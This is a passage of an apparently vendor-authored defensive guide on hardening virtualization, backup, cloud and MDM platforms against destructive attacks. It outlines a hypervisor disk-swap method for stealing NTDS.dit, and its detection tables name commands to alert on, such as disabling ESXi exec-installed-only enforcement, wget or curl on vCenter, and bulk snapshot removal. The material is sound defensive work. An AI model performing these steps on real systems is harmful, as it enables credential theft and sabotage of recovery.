<p><span>Organizations should implement a proactive, defense-in-depth technical hardening strategy to systematically address security gaps and mitigate the risk of offline credential theft from the hypervisor layer. The core of this attack is an offline credential theft technique known as a "Disk Swap." Once an adversary has administrative control over the hypervisor (vSphere or Hyper-V), they perform the following steps:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Target Identification:</strong><span> The actor identifies a critical virtualized asset, such as a Domain Controller (DC) </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Offline Manipulation:</strong><span> The target VM is powered off, and its virtual disk file (e.g., .vmdk for VMware or .vhd/.vhdx for Hyper-V) is detached.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>NTDS.dit Extraction</strong><span>: The disk is attached to a staging or "orphaned" VM under the attacker's control. From this unmonitored machine, they copy the NTDS.dit Active Directory database.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Stealthy Recovery</strong><span>: The disk is re-attached to the original DC, and the VM is powered back on, leaving minimal forensic evidence within the guest operating system.</span></p>
</li>
</ul>
<h6><span>Hardening and Mitigation Guidance</span></h6>
<p><span>To defend against this logic, organizations must implement a defense-in-depth strategy that focuses on cryptographic isolation and strict lifecycle management.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Virtual Machine Encryption</strong><span>: Organizations must encrypt all Tier 0 virtualized assets (e.g., Domain Controllers, PKI, and Backup Servers). Encryption ensures that even if a virtual disk file is stolen or detached, it remains unreadable without access to the specific keys. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Strict Decommissioning Processes</strong><span>: Do not leave powered-off or "orphaned" virtual machines on datastores. These "ghost" VMs are ideal staging environments for attackers. Formally decommission assets by deleting their virtual disks rather than just removing them from the inventory.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Harden Hypervisor Accounts</strong><span>: Disable or restrict default administrative accounts (such as root on ESXi or the local Administrator on Hyper-V hosts). Enforce </span><a href="https://knowledge.broadcom.com/external/article/336894/enabling-or-disabling-lockdown-mode-on-a.html" rel="noopener" target="_blank"><span>Lockdown Mode</span></a><span> (VMware ESXi feature) where possible to prevent direct host-level changes outside of the central management plane.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Remote Audit Logging</strong><span>: Enable and forward all hypervisor-level audit logs (e.g., hostd.log, vpxa.log, or Windows Event Logs for Hyper-V) to a centralized SIEM. </span></p>
</li>
</ul>
<h5><span>Protecting Backups</span></h5>
<p><span>Security measures must encompass both production and backup environments. An attack on the production plane is often coupled with a simultaneous focus on backup integrity, creating a total loss of operational continuity. Virtual disk files (VMDK for VMware and VHD/VHDX for Hyper-V) represent a high-value target for offline data theft and direct manipulation.</span></p>
<h6><span>Hardening and Mitigation Guidance</span></h6>
<p><span>To mitigate the risk of offline theft and backup manipulation, organizations must implement a "Default Encrypted" policy across the entire lifecycle of the virtual disk .</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>At-Rest Encryption for all Tier-0 Assets:</strong><span> Implement vSphere VM Encryption or Hyper-V Shielded VMs for all critical infrastructure (e.g., Domain Controllers, Certificate Authorities). This ensures that the raw VMDK or VHDX files are cryptographically protected, rendering them unreadable if detached or mounted by an unauthorized party.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Encrypted Backup Repositories</strong><span>: Ensure that the backup application is configured to encrypt backup data at rest using a unique key stored in a separate, hardened Key Management System (KMS). This prevents "direct manipulation" of the backup files even if the backup storage itself is compromised. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Network Isolation of Storage &amp; Backups: </strong><span>Isolate the storage management network and the backup infrastructure into dedicated, non-routable VLANs. Access to the backup console and repositories must require phishing-resistant MFA and originate from a designated Privileged Access Workstation (PAW).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Immutability and Air-Gapping</strong><span>: Use Immutable Backup Repositories to ensure that once a backup is written, it cannot be modified or deleted by any user including a compromised administrator for a set period. This provides a definitive recovery point in the event of a ransomware attack or intentional data sabotage.</span></p>
</li>
</ul>
<h4><span>Detection Opportunities for Monitoring Virtualization Infrastructure</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Unauthorized Access Attempt to Virtualized Infrastructure</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for attempted logins to virtualized infrastructure by unauthorized accounts.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Unauthorized SSH Connection Attempt</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/004/" rel="noopener" target="_blank"><span>T1021.004 – Remote Services: SSH</span></a></p>
</td>
<td>
<p><span>Search for instances where an SSH connection is attempted when SSH has not been enabled for an approved purpose or is not expected from a specific origination asset.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>ESXi Shell/SSH Enablement</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1059/004/" rel="noopener" target="_blank"><span>T1059.004 - Command and Scripting Interpreter</span></a></p>
</td>
<td>
<p><span>Monitor ESXi hostd.log and shell.log for the SSH service being enabled via DCUI, vSphere client, or API calls. Alert on any ESXi SSH enablement event that was not preceded by an approved change request.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Bulk VM Power-Off Events</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1529/" rel="noopener" target="_blank"><span>T1529 - System Shutdown/Reboot</span></a></p>
</td>
<td>
<p><span>Detect sequences where multiple VMs are powered off within a short time window (e.g., &gt;5 VMs in 10 minutes) via vCenter events. </span></p>
<p><span>Correlate with vpxd.log "ReceivedPowerOffVM" events.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>VMDK File Access from Non-Standard Processes</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1486/" rel="noopener" target="_blank"><span>T1486 - Data Encrypted for Impact</span></a></p>
</td>
<td>
<p><span>Monitor for processes accessing .vmdk, .vmx, .vmsd, or .vmsn files outside of normal VMware service processes (hostd, vpxd, fdm). </span></p>
</td>
</tr>
<tr>
<td>
<p><span>execInstalledOnly Disablement</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1562/001/" rel="noopener" target="_blank"><span>T1562.001 - Impair Defenses: Disable or Modify Tools</span></a></p>
</td>
<td>
<p><span>Monitor ESXi shell.log for execution of "esxcli system settings encryption set" with "--require-exec-installed-only=F" or "--require-secure-boot=F". Alert on any cryptographic enforcement disablement event that was not preceded by an approved change request.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>vCenter SSO Identity Modification</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1556/" rel="noopener" target="_blank"><span>T1556 - Modify Authentication Process</span></a></p>
</td>
<td>
<p><span>Monitor vCenter events and vpxd.log for modifications to SSO identity sources, including the addition of new LDAP providers or changes to vshphere.local administrator group membership. Alert on an identity source change not initiated from a designated PAW subnet.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>VM Disk Detach and Reattach to Non-Inventory VM</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1486/" rel="noopener" target="_blank"><span>T1486 - Data Encrypted for Impact</span></a></p>
</td>
<td>
<p><span>Detect sequences where a virtual disk is removed from a Tier-0 asset via "vim.event.VmReconfiguredEvent" and subsequently attached to an orphaned or non-standard inventory VM. </span></p>
<p><span>Correlate with "vim.event.VmRegisteredEvent" events on non-standard datastore paths within the same time window.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>VCSA Shell Command Anomaly</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1059/004/" rel="noopener" target="_blank"><span>T1059.004 - Command and Scripting Interpreter: Unix Shell</span></a></p>
</td>
<td>
<p><span>Monitor VCSA shell audit logs for execution of high-risk commands (e.g., wget, curl, psql, certificate-manager) by any user following an interactive SSH session. Alert on any instance where these commands are executed outside of an approved change window.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Bulk Snapshot Deletion</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span>T1490 - Inhibit System Recovery</span></a></p>
</td>
<td>
<p><span>Detects sequences where snapshots are removed across multiple VMs within a short time window via vCenter events. Correlate with "vim-cmd vmsvc/snapshot.removeall" execution in hostd.log to confirm host-level action.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 7: Detection opportunities for VMware vSphere </span></div></div>
<div class="block-paragraph_advanced"><h4><span>Protecting Against DDoS Attacks</span></h4>
<p><span>A distributed denial-of-service (DDoS) attack is an example of a disruptive attack that could impact the availability of cloud-based resources and services. Modernized DDoS protection must extend beyond the legacy concepts of filtering and rate-limiting, and include cloud-native capabilities that can scale to combat adversarial capabilities.</span></p>
<p><span>In addition to third-party DDoS and web application access protection services, the following table provides an overview of DDoS protection capabilities within common cloud-based infrastructures.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Cloud Provider</strong></p>
</td>
<td>
<p><strong>DDoS Protection Capability </strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Google Cloud</span></p>
</td>
<td>
<p><a href="https://cloud.google.com/security/products/armor"><span>Google Cloud Armor</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Amazon Web Services</span></p>
</td>
<td>
<p><a href="https://aws.amazon.com/shield/" rel="noopener" target="_blank"><span>AWS Shield</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft Azure</span></p>
</td>
<td>
<p><a href="https://azure.microsoft.com/en-us/products/ddos-protection" rel="noopener" target="_blank"><span>Azure DDoS Protection</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Cloud Platform Agnostic </span></p>
</td>
<td>
<p><a href="https://www.imperva.com/products/web-application-firewall-waf/" rel="noopener" target="_blank"><span>Imperva WAF</span></a></p>
<p><a href="https://www.akamai.com/glossary/what-is-a-waf" rel="noopener" target="_blank"><span>Akamai WAF</span></a></p>
<p><a href="https://www.cloudflare.com/ddos/" rel="noopener" target="_blank"><span>Cloudflare DDoS Protection</span></a></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 8: Common cloud capabilities to mitigate DDoS attacks</span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Hardening the Cloud Perimeter </span></h4>
<p><span>With the hybrid operating model of modern day infrastructure, cloud consoles and SaaS platforms are high-value targets for credential harvesting and data exfiltration. Minimizing these risks requires a dual-defense strategy: robust identity controls to prevent unauthorized access, and platform-specific guardrails to protect access to resources, data, and to minimize the attack surface. </span></p>
<h5><span>Strong Authentication Enforcement</span></h5>
<p><span>Strong authentication is the foundational requirement for cloud resilience and securing cloud infrastructure. Similar to on-premises environments, a compromise of a privileged credential, token, or session could lead to unintended consequences that result in a high-impact event for an organization. To mitigate these pervasive risks, organizations must unconditionally enforce strong authentication for all external-facing cloud services, administrative portals, and SaaS platforms. </span></p>
<p><span>Organizations should enforce the usage of phishing-resistant authenticators such as FIDO2 (WebAuthn) hardware tokens or passkeys, or certificate based authentication for accounts assigned privileged roles and functions. For non-privileged users, authenticator software (Microsoft Authenticator or Okta Verify) should be configured to utilize device-bound factors such as Windows Hello for Business or TouchID.</span></p>
<p><span>Additionally, organizations should leverage the concept of authenticators (identity + device attestation) as part of the authentication transaction. This includes enforcing a validated-device access policy that restricts privileged access to only originate from managed, compliant, and healthy devices. Trusted network zones should be defined in order to restrict access to cloud resources from the open internet. Untrusted network zones should be defined to restrict authentication from anonymizing services such as VPNs or TOR. Using device-bound session credentials where possible mitigates the risk of session token theft.</span></p>
<h5><span>Identity and Device Segmentation for Privileged Actions</span></h5>
<p><span>The implementation of privileged access workstations (PAWs) is a critical defense against threat actors attempting to compromise administrative sessions. A PAW is a highly hardened, dedicated hardware endpoint used exclusively for sensitive administrative tasks.</span></p>
<p><span>Administrators should leverage a non-privileged account for daily tasks, while privileged actions are restricted to only being permissible from the hardened PAW, or from explicitly defined IP ranges. This "air-gap" between communication and administration prevents an adversary from moving laterally from a compromised non-privileged identity to a privileged context within hybrid environments. </span></p>
<h5><span>Just-in-Time Access and the Principle of Least Privilege</span></h5>
<p><span>Static, standing privileges present a security risk in hybrid environments. Following a zero-trust cloud architecture, administrative privileges should be entirely ephemeral. Implementing Just-In-Time (JIT) and Just-Enough-Access (JEA) mechanisms ensures that administrators are granted only the specific, granular permissions necessary to perform a discrete task, and only for a highly limited duration, after which the permissions are automatically revoked. This architectural model provides organizations with the ability to enforce approvals for privileged actions, enhanced monitoring, and detailed visibility regarding any privileged actions taken within a specific session.</span></p>
<h5><span>Securing Non-Human Identities</span></h5>
<p><span>Organizations should implement identity governance practices that include processes to rotate API keys, certificates, service account secrets, tokens, and sessions on a predefined basis. AI agents or identities correlating to autonomous outcomes should be configured with strictly scoped permissions and associated monitoring. Non-privileged users should be restricted from authorizing third-party application integrations or creating API keys without organizational approval.</span></p>
<p><span>Continuous scanning should be performed to identify and remediate hard-coded secrets and sensitive credentials across all cloud and SaaS environments.</span></p>
<h5><span>Storage Infrastructure Security and Immutable Backups</span></h5>
<p><span>The strategic objective of a destructive cyberattack—whether for extortion or sabotage—is to prolong recovery and reconstitution efforts by ensuring data is irrecoverable. Modern adversaries systematically target the backup plane as part of a destructive event. If backups remain mutable or share an identity plane with the primary environment, attackers can delete or encrypt them, transforming an incident into a prolonged and chaotic recovery exercise.</span></p>
<p><span>While modern-day redundancy for backups should include multiple data copies across diverse media, geographic separation can be a subverted defensive strategy if logical access is unified. To ensure resilience against destructive attacks, the secondary recovery environment should reside within a sovereign cloud tenant or isolated subscription. This environment should be governed by an independent Identity and Access Management (IAM) plane, using distinct credentials and administrative personas that share no commonality with the production environment.</span></p>
<p><span>Backups within an isolated environment must be anchored by immutable storage architectures. By leveraging hardware-verified Write-Once, Read-Many (WORM) technology, the recovery plane ensures that data integrity is mathematically guaranteed. Once committed, data cannot be modified, encrypted, or deleted—even by accounts with root or global administrative privileges, until the retention period expires. This creates a definitive "fail-safe" that ensures a known-good recovery point remains accessible regardless of potential security risks in the primary environment.</span></p>
<p><span>Additional defense-in-depth security architecture controls relevant to common cloud-based infrastructures are included in Table 9.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Cloud Provider</strong></p>
</td>
<td>
<p><strong>Identity Controls</strong></p>
</td>
<td>
<p><strong>Secrets Governance</strong></p>
</td>
<td>
<p><strong>Network Controls</strong></p>
</td>
<td>
<p><strong>Policy Guardrails</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Google Cloud</span></p>
</td>
<td>
<p><a href="https://docs.cloud.google.com/iam/docs/deny-overview"><span>IAM Deny Policies</span></a></p>
</td>
<td>
<p><a href="https://cloud.google.com/security/products/secret-manager"><span>Secret Manager</span></a></p>
</td>
<td>
<p><a href="https://cloud.google.com/security/vpc-service-controls"><span>VPC Service Controls</span></a></p>
</td>
<td>
<p><a href="https://docs.cloud.google.com/resource-manager/docs/organization-policy/overview"><span>Organization Policy Service</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Amazon Web Services</span></p>
</td>
<td>
<p><a href="https://aws.amazon.com/iam/identity-center/" rel="noopener" target="_blank"><span>IAM Identity Center</span></a></p>
</td>
<td>
<p><a href="https://aws.amazon.com/secrets-manager/" rel="noopener" target="_blank"><span>Secrets Manager</span></a></p>
</td>
<td>
<p><a href="https://aws.amazon.com/verified-access/" rel="noopener" target="_blank"><span>Verified Access</span></a></p>
</td>
<td>
<p><a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html" rel="noopener" target="_blank"><span>Service Control Policies</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft Azure</span></p>
</td>
<td>
<p><a href="https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-configure" rel="noopener" target="_blank"><span>Entra ID (PIM)</span></a></p>
</td>
<td>
<p><a href="https://azure.microsoft.com/en-us/products/key-vault" rel="noopener" target="_blank"><span>Azure Key Vault</span></a></p>
</td>
<td>
<p><a href="https://azure.microsoft.com/en-us/products/virtual-network/" rel="noopener" target="_blank"><span>Azure Virtual Network</span></a></p>
<p><a href="https://azure.microsoft.com/en-us/products/private-link" rel="noopener" target="_blank"><span>Private Link</span></a></p>
</td>
<td>
<p><a href="https://learn.microsoft.com/en-us/azure/governance/policy/overview" rel="noopener" target="_blank"><span>Azure Policy</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Cloud Agnostic Security Solutions</span></p>
</td>
<td>
<p><a href="https://www.okta.com/learn/okta-identity-cloud/" rel="noopener" target="_blank"><span>Okta</span></a></p>
<p><a href="https://www.sailpoint.com/products/identity-security-cloud" rel="noopener" target="_blank"><span>SailPoint</span></a></p>
<p><a href="https://www.pingidentity.com/en/platform/pingone-advanced-identity-cloud.html" rel="noopener" target="_blank"><span>Ping Identity</span></a></p>
</td>
<td>
<p><a href="https://www.hashicorp.com/en/products/vault/use-cases/secrets-management" rel="noopener" target="_blank"><span>Hashicorp Vault</span></a><span> </span><a href="https://docs.cyberark.com/secrets-manager-saas/latest/en/content/get%20started/key_concepts/secrets.html" rel="noopener" target="_blank"><span>CyberArk</span></a></p>
</td>
<td>
<p><a href="https://help.zscaler.com/zpa/understanding-zpa-zia-and-zscaler-client-connector-clouds" rel="noopener" target="_blank"><span>Zscaler</span></a></p>
<p><a href="https://www.netskope.com/products/security-service-edge" rel="noopener" target="_blank"><span>Netskope SSE</span></a></p>
</td>
<td>
<p><a href="https://www.wiz.io/" rel="noopener" target="_blank"><span>Wiz</span></a></p>
<p><a href="https://www.paloaltonetworks.com/prisma/cloud" rel="noopener" target="_blank"><span>Palo Alto Prisma Cloud</span></a></p>
<p><a href="https://orca.security/" rel="noopener" target="_blank"><span>Orca Security</span></a></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 9: Common cloud capabilities for infrastructure hardening</span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for Protecting Cloud Infrastructure and Resources</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Cloud Account Abuse</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/004/" rel="noopener" target="_blank"><span>T1078.004 - Valid Accounts: Cloud Accounts</span></a></p>
</td>
<td>
<p><span>Monitor cloud audit logs for authentication from unseen source IPs, anomalous ASNs, or impossible travel patterns. </span></p>
<p><span>Alert on IAM policy modifications, new role assignments, and service account key creation by accounts without prior administrative API activity.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Lateral Movement via Cloud Interfaces</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/007/" rel="noopener" target="_blank"><span>T1021.007 - Remote Services: Cloud Services</span></a></p>
</td>
<td>
<p><span>Detect interactive console sign-ins from IPs that previously only performed programmatic API/CLI access. Alert on cloud CLI execution from non-administrative endpoints. </span></p>
<p><span>Monitor for cross-service lateral movement where a single identity authenticates to multiple cloud services in a compressed timeframe outside its historical access pattern.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Modify Cloud Compute Configurations</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1578/005/" rel="noopener" target="_blank"><span>T1578.005 - Modify Cloud Compute Configurations</span></a></p>
</td>
<td>
<p><span>Monitor for unauthorized compute changes including bulk instance creation or deletion deviating from change management baselines. </span></p>
<p><span>Alert on snapshot creation of production volumes by non-backup accounts, disk detach/reattach targeting domain controller or database instances for offline credential theft, and network/firewall modifications exposing internal services to public access.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Cloud Log Enumeration</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1654/" rel="noopener" target="_blank"><span>T1654 - Log Enumeration</span></a></p>
</td>
<td>
<p><span>Monitor for API calls listing or accessing logging configurations from identities without documented operational need. </span></p>
<p><span>Alert on enumeration of SIEM integration settings, log export destinations, and alert rule definitions.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Mass Deletion &amp; Impact</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span>T1490 - Inhibit System Recovery</span></a></p>
</td>
<td>
<p><span>Alert when bulk delete API calls exceed baseline thresholds targeting compute instances, storage, databases, or virtual networks. </span></p>
<p><span>Detect deletion or retention reduction of recovery-critical resources including backup vaults, snapshot schedules, and disaster recovery configurations.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Backup Policy Modification or Deletion</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span>T1490 - Inhibit System Recovery</span></a></p>
</td>
<td>
<p><span>Monitor for unauthorized modifications to backup configurations, including changes to WORM retention policies, backup vault access policies, snapshot deletion, or backup schedule disablement. </span></p>
<p><span>Alert on backup storage account access from identities other than designated backup service accounts.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Conditional Access or Security Policy Modification</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1556/009/" rel="noopener" target="_blank"><span>T1556.009 - Conditional Access Policies</span></a></p>
</td>
<td>
<p><span>Monitor cloud identity provider audit logs for modifications to Conditional Access Policies, MFA enforcement rules, legacy authentication blocking rules, or PIM/JIT role settings. Alert on changes that add location or device exclusions to MFA policies, disable legacy protocol blocks, extend privilege role activation durations, or register new authentication methods on privileged accounts.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 10: Detection opportunities for protecting cloud infrastructure and resources</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Securing Endpoint and Mobile Device Management Platforms</span></h4>
<p><span>Protecting endpoint and Mobile Device Management (MDM) platforms is crucial to ensuring the security and availability of devices used in support of operations. In the context of </span><a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank"><span>wiper</span></a><span> and destructive-style attacks, these platforms represent the "keys to the kingdom" that threat actors can target to turn an organization’s own infrastructure against itself.</span></p>
<p><strong>Force Multiplier:</strong><span> MDM and endpoint management tools have the inherent ability to push configurations and scripts to enrolled and managed devices. If compromised, a threat actor can use these legitimate administrative platforms to deploy wiper malware or execute remote wipe commands simultaneously across the entire enterprise, achieving destruction in minutes.  </span></p>
<p><span>Unlike ransomware, where data might be recoverable via decryption, wiper attacks aim for the permanent destruction of the Master Boot Record (MBR), GUID Partition Table (GPT), Master File Table (MFT), or overwrite the file system making endpoint devices inaccessible. </span></p>
<h5><span>Proactive Hardening</span></h5>
<p><span>Enforcing strong identity and network controls for securing the management plane can prevent an attacker from gaining access to endpoint and MDM platforms and abusing intended functionality (e.g., deploying wiper scripts or issuing  "Remote Wipe" or "Factory Reset" commands).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Enforce strong authentication (e.g., phishing-resistant MFA, including FIDO2) for identities assigned privileged roles and functions.</span></p>
</li>
<li aria-level="1">
